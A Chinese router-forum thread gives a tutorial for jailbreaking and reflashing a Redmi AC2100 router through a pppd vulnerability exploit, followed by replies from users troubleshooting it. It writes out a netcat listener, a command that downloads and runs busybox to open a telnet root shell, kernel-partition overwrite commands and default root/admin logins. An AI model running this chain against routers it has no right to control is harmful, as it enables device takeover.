QQ登录

只需一步,快速开始

搜索
广告投放联系QQ68610888

[AC2100(RM2100)] 红米AC2100刷机自动&手动!

上传不了附件就不上传啊,你们可以去下
https://www.right.com.cn/forum/thread-4016985-1-1.html   的包!

手动是当自动没有反弹的时候使用!能反就不要用这个了,没图教程,灵魂学习~

感谢我群老哥lework  1003877216改的循环pppd-cve.py

手动时使用pppd-cve.py替换redmi文件来下pppd-cve.py

解压出来的rm2100文件夹要放到桌面,你不放到桌面你就在在CMD里用命令进入到rm2100目录里,才能运行下面的命令!

打开4个CMD
然后4个全输入cd C:\Users\Administrator\Desktop\rm2100 来到刷机rm2100文件夹里面!

然后第一个窗口输入python.exe redmi\PPPoE_Simulator.py
第二个输入python.exe -m http.server 8081
第三个输入入nc.exe -nvlp 31337
然后就进路由器,拔号断开,然后再点拔好,直到那里显示连接成功!

第四个就输入python.exe redmi\pppd-cve.py

等待第三个监视里出现IP信息!

然后在第三个CMD命令窗口里输入
cd /tmp&&wget http://192.168.31.177:8081/busybox&&chmod a+x ./busybox&&./busybox telnetd -l /bin/sh

等等命令完成,弹出shell窗口!

shell窗口输入命令
wget http://192.168.31.177:8081/r3g.bin&&nvram set uart_en=1&&nvram set bootdelay=5&&nvram set flag_try_sys1_failed=1&&nvram commit
mtd -r write r3g.bin kernel1

等待完成!

先更改本地连接IP地址为192.168.1.X网段,255.255.255.0    网关192.168.1.1

然后用WINscp 连接192.168.1.1,协议是SCP,账号:root   密码:admin

然后上最上面的三点,切到主目录后,选择tmp文件夹,放进固件redmi.trx

完成后再打开putty打开192.168.1.1,账号:root   密码:admin

然后出出现的OP窗口里执行
mtd -r write /tmp/redmi.trx kernel

等待完成!

本地连接设为自动获取IP!

就可以通过192.168.2.1 账号:root   密码:admin 进入路由设置页面!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

你说的很对,我赞同你的说法。: 5.0
你说的很对,我赞同你的说法。: 5

评分

情天捡叶 + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
啦啦啦爱你哟 + 1 生活不易,相遇也不易,既然这样,让我们成为朋友一起面朝大海、花开花落……

我的恩山、我的无线 The best wifi forum is right here.
果然是灵魂学习,如果不是自己原先失败过好多次根本看不懂。我都快放弃了,这次能不能成功啊

所以你现在成功没  详情 回复 发表于 2020-11-21 11:42
我的恩山、我的无线 The best wifi forum is right here.

其实按照视频老老实实刷啥事没有……

懒得装虚拟机!  详情 回复 发表于 2020-5-1 17:04

jzhf 发表于 2020-5-1 17:03
其实按照视频老老实实刷啥事没有……

懒得装虚拟机!

惊喜,终于在nc监听界面出现了ip地址.但是在第三个cmd窗口输入相关命令,显示找不到路径。
另外,楼主应该在教程里面加上一段话,就是必须把原来的redmi文件夹解压到桌面才行。要不然你的四个cmd命令都无效的,小小小白看不懂

谢谢,我忘了之前还记得要写的!  详情 回复 发表于 2020-5-1 17:25

感谢大神!

618准备购买ac2100,已经添加到购物车里了

alexsybil 发表于 2020-5-1 17:07
惊喜,终于在nc监听界面出现了ip地址.但是在第三个cmd窗口输入相关命令,显示找不到路径。
另外,楼主应该 ...

谢谢,我忘了之前还记得要写的!

我发现这简直是TMD撞大运。我第一次运行的时候,程序发了十个包左右就被监听到了,只是输入cd /tmp&&wget http://192.168.31.177:8081/busybox&&chmod a+x ./busybox&&./busybox telnetd -l /bin/sh显示找不到路径;  详情 回复 发表于 2020-5-1 17:30

Guaniu 发表于 2020-5-1 17:25
谢谢,我忘了之前还记得要写的!

我发现这简直是TMD撞大运。我第一次运行的时候,程序发了十个包左右就被监听到了,只是输入cd /tmp&&wget http://192.168.31.177:8081/busybox&&chmod a+x ./busybox&&./busybox telnetd -l /bin/sh显示找不到路径;
第二次运行的时候,程序发包发了至少六七十个,一次都没有被监视到。真心受不了了。
隔壁的虚拟机我也尝试了,失败。
为了这台破路由,我已经花了三十个小时左右在,昨晚还熬夜到三点,我也奥疯了

我也是这种情况 也是用了这么久没搞定 难受  详情 回复 发表于 2020-5-1 20:55
你是不是路由器的IP没有设成192.168.31.1  详情 回复 发表于 2020-5-1 17:44

alexsybil 发表于 2020-5-1 17:30
我发现这简直是TMD撞大运。我第一次运行的时候,程序发了十个包左右就被监听到了,只是输入cd /tmp&&wget ...

你是不是路由器的IP没有设成192.168.31.1

已经设置了,否则不会之前监听到地址  详情 回复 发表于 2020-5-1 19:53

请教一下大佬…这是啥情况啊?

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

仔细看了下他根没有有进到目录还在C盘他的东西在F盘根目录!  详情 回复 发表于 2020-5-1 22:10
你是不是没有显示文件后缀名...  详情 回复 发表于 2020-5-1 19:48

CMOS 发表于 2020-5-1 17:53
请教一下大佬…这是啥情况啊?

我的 cd的位置自己改过了

位置不要带中文名称试试!  详情 回复 发表于 2020-5-1 19:14
你只要把那个WIN的一键解压出来的re2100这个文件夹放到桌面就可以用了!  详情 回复 发表于 2020-5-1 19:13

你只要把那个WIN的一键解压出来的re2100这个文件夹放到桌面就可以用了!

位置不要带中文名称试试!

Guaniu 发表于 2020-5-1 19:13
你只要把那个WIN的一键解压出来的re2100这个文件夹放到桌面就可以用了!

感觉不是位置得问题诶…